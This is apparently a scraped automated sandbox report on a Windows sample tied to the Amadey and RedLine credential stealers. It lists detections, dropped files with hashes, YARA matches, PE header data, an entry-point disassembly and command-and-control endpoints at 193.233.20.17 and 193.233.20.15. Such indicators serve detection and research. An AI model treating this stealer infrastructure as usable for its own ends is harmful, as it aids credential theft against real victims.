                          1.2.sEm51bM.exe.320000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
                          0.3.21fvBVFMsn.exe.4a8da20.0.unpack | 100% | Avira | HEUR/AGEN.1215503
                          0.0.21fvBVFMsn.exe.a40000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
                          2.0.sMt14vz.exe.10d0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
193.233.20.17:4139 | true | URL Reputation: safe | unknown
193.233.20.15/dF30Hn4m/index.php | true | 1%, Virustotal; Avira URL Cloud: safe | low
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id19kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnskxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id10ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RenewkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id8ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id4(kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentitykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://search.yahoo.com?fr=crmas_sfpfkxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingexkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoorkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsekxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
193.233.20.17 | unknown | Russian Federation | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true
                                                                                                                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                          Analysis ID:811560
                                                                                                                                                          Start date and time:2023-02-19 02:31:04 +01:00
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 8m 30s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Number of analysed new started processes analysed:20
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample file name:21fvBVFMsn.exe
                                                                                                                                                          Original Sample Name:478e1c903cfcda85acdb9759ae80e155.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@12/8@0/1
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 80%
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                                                          • Quality average: 85.2%
                                                                                                                                                          • Quality standard deviation: 22.7%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 191
                                                                                                                                                          • Number of non-executed functions: 96
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 8.238.88.254, 8.248.133.254, 67.26.139.254, 8.248.149.254, 8.250.153.254, 209.197.3.8
                                                                                                                                                          • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
                                                                                                                                                          • Execution Graph export aborted for target kxL91dA.exe, PID 3228 because it is empty
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:32:34 | API Interceptor | 15x Sleep call for process: kxL91dA.exe modified
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          193.233.20.17LwExBhgzp5.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                            w1HEWorb6R.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                              sYIDRk0xB6.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                V34prXiUKp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                  j28TljQdlz.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                    7epTSsuohp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                      QhT58d7Wa8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                        001b09ececb8774d65d01bc2d0e8361072bae77ccaa7f.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                          R25yrPZVWB.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                            jb52PkNUda.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                              O3HGpnzpVR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                73IPnhSw0f.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                  pjJw2RuL8g.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                    Gs3364OsSz.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                      kXCd4W2VY6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        d6wHjfEmem.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                          lMBbFLk6Up.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            X2dIcltgDn.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              8lP87m2wD6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                p3xSYI3ht2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  No context
Process: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
Entropy (8bit): 5.354940450065058
Encrypted: false
SSDEEP: 6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5: B10E37251C5B495643F331DB2EEC3394
SHA1: 25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256: 8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512: 296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

Process: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2843
Entropy (8bit): 5.3371553026862095
Encrypted: false
SSDEEP: 48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1HG1qL:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxo
MD5: 23C2D90E17CA7696A67D1409932B5A7C
SHA1: 016D0108FE25645BB4A643E978633C172DE8851A
SHA-256: 8578583C1EF6E115971E420D1576C548F8342D459FE2B99728AC9BDA4A8C852B
SHA-512: 9308C444DA9CC60756A8450C8BFE72F77CDD41F81B6023EFD2015C77F83035540173B49507D07AD33A137587867E7FA7A4EA1975C35255774C24D38B0C445A38
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

Process: C:\Users\user\Desktop\21fvBVFMsn.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 245248
Entropy (8bit): 6.363751855454997
Encrypted: false
SSDEEP: 6144:U6f3mSV2p10caphMnboArJMuVyhpLT7oC2y8nU:UTb0caE0A2uVybLT7oChd
MD5: 0179181B2D4A5BB1346B67A4BE5EF57C
SHA1: 556750988B21379FD24E18B31E6CF14F36BF9E99
SHA-256: 0A763637206A70A3EC6707FE5728EA673AE3BC11EB5E059D962E99DCC3991F31
SHA-512: 1ADAAB4993EC3D1E32B9CC780AB17B5A6ACFE352789AAF2872E91BEF738DD5ACA3115071AC42A21C4FD19A82A522B515243EBEF340249115CFBE6951CB3C9CEE
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 72%
• Antivirus: Virustotal, Detection: 69%
Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: l90N7uj8BJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: W0n2ZfP89x.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\21fvBVFMsn.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):571904
                                                                                                                                                                                                                                          Entropy (8bit):7.826338389411454
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:yMr6y90++2JKNtPKEw3Lm/fy9N6aaEaUDZWoRwm2l3SB:UyxN8iaXYNl60f+tSB
                                                                                                                                                                                                                                          MD5:EE9CEC71CDD89A723F90D5013E963B02
                                                                                                                                                                                                                                          SHA1:43894D2D70B751A2F54E58AF8124DCE57FF7B5CD
                                                                                                                                                                                                                                          SHA-256:214DB2BB6E847D0A783D2973B83150D3805CC2144342A41DFEDE3B90B4187853
                                                                                                                                                                                                                                          SHA-512:AC27FC72516D0ADD01F1FE18AD593B0003D661949ADE7889A45A9DD23EC31B4D10CA59F551B967A9291C7B70EA9C5F4BB1521509366201A1E0BCB3867025B067
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 55%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):357376
                                                                                                                                                                                                                                          Entropy (8bit):7.319017097214291
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:4FyoLGl224CQudunpkF+syy4rl1dGSraZ6D47/2pCbsYoqu:4woCl223QudunpM+JlaEaUD29sR
                                                                                                                                                                                                                                          MD5:8A8E17457F2ADB572257270B521CD527
                                                                                                                                                                                                                                          SHA1:2B8BD22C7220ACF82A5DAE2428EB1CBADA13C119
                                                                                                                                                                                                                                          SHA-256:8A92F1C6D8A530BAEC6BADB2C91636C1DE336B2AFB54EA9E6FB718D53A452F5F
                                                                                                                                                                                                                                          SHA-512:1035EC0CE7EFD17256CDF6513BD5CCE269C900F668290D3077C203FE10CCDD2C6193CCD32DE0138A80C1F64B8EC9A2F044C536BAB5DE00567D0E45D91F9B4C88
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 41%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):206848
                                                                                                                                                                                                                                          Entropy (8bit):7.244182454113531
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:K1y+bnr+O1Q5GWp1icKAArDZz4N9GhbkrNEk6alaJRiHUKlYj:K1y+bnr+Pp0yN90QE8sJ0Uf
                                                                                                                                                                                                                                          MD5:EA0FADAB5F038CDB93F37EA867C62934
                                                                                                                                                                                                                                          SHA1:9BB0D6C6B3D769F1CA784BE50CA1EE9A033E5055
                                                                                                                                                                                                                                          SHA-256:0AECA2DB604D99082880C8DA7903A91874195936BF859496DD44C31324FDF8EA
                                                                                                                                                                                                                                          SHA-512:1DD60138E438D074DBDE94CF3BC3102C18ADD7DA44D6A57C7B933D0DDE11FEA2B9EFB09A73515A7B31499E4142A4F3328D79461A4659080F5B7AA0E6725ADD10
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                                                                          Entropy (8bit):4.97029807367379
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                                                          MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                          SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                                                                                                                                                                                          SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                                                                                                                                                                                          SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):179200
                                                                                                                                                                                                                                          Entropy (8bit):4.949585044867417
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:cxqZWJBaKULo3HieYaez5F0h4/xNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuwk:yqZIHi5t0h
                                                                                                                                                                                                                                          MD5:C9C03EC2426C8416841FD7E93BB9DC3D
                                                                                                                                                                                                                                          SHA1:FD9430CC92842D29F76A7B3169EEE466F67273DB
                                                                                                                                                                                                                                          SHA-256:35BF034217A7E519626A2E1F7D1627322EBB31F9FA8E839EAFDF7AE2CDE977BE
                                                                                                                                                                                                                                          SHA-512:75D4A52CF4DCF4F43B3537344588393FBB96F9ED0173FF2981A497BD359FFBA9B7FED2BA7EB2FF04341D7FA2969CC2068EDEE009DF6E8292938E408BE41D7E5A
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: ditekSHen
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.886498186028406
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:21fvBVFMsn.exe
                                                                                                                                                                                                                                          File size:764928
                                                                                                                                                                                                                                          MD5:478e1c903cfcda85acdb9759ae80e155
                                                                                                                                                                                                                                          SHA1:dc03499087dfa49b93fd9ba4b1452d0af8baef46
                                                                                                                                                                                                                                          SHA256:fd0f2580ee525c2fbde7b187b7b385a56e1817a219da7f3c398992a2c784a7d1
                                                                                                                                                                                                                                          SHA512:b3fd0e4810d987dcb232afa0d6c45a6dbc6bedc01538af0127f4f56d73a9da735870e29953c72efac74b08fc642702661427c3989bbd8de4b374190ba2affdab
                                                                                                                                                                                                                                          SSDEEP:12288:6MrMy90EI++bhYm1rUuQ/PKIwjcm/RySNvahEaUDZvoRFm2lR4B9pbap5RUGn:WyHIH1PrUBshJHNid0ufH4B2hPn
                                                                                                                                                                                                                                          TLSH:29F4124BE7CC8035F8F1177058F602D30A36BE615B788396274E6E5D5873AA0E27276B
                                                                                                                                                                                                                                          Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                                                          Entrypoint:0x406a60
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:10
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:10
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:10
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          call 00007F47BCC77745h
                                                                                                                                                                                                                                          jmp 00007F47BCC77055h
                                                                                                                                                                                                                                          push 00000058h
                                                                                                                                                                                                                                          push 004072B8h
                                                                                                                                                                                                                                          call 00007F47BCC777E7h
                                                                                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                                                                                          mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                          lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                          call dword ptr [0040A184h]
                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                          mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                          mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                          mov edi, ebx
                                                                                                                                                                                                                                          mov edx, 004088ACh
                                                                                                                                                                                                                                          mov ecx, esi
                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                          lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007F47BCC7706Ah
                                                                                                                                                                                                                                          cmp eax, esi
                                                                                                                                                                                                                                          jne 00007F47BCC77059h
                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                          mov edi, esi
                                                                                                                                                                                                                                          jmp 00007F47BCC77062h
                                                                                                                                                                                                                                          push 000003E8h
                                                                                                                                                                                                                                          call dword ptr [0040A188h]
                                                                                                                                                                                                                                          jmp 00007F47BCC77029h
                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          jne 00007F47BCC7705Ch
                                                                                                                                                                                                                                          push 0000001Fh
                                                                                                                                                                                                                                          call 00007F47BCC7757Bh
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          jmp 00007F47BCC7708Ch
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                                                          jne 00007F47BCC7707Eh
                                                                                                                                                                                                                                          mov dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          push 004010C4h
                                                                                                                                                                                                                                          push 004010B8h
                                                                                                                                                                                                                                          call 00007F47BCC771A6h
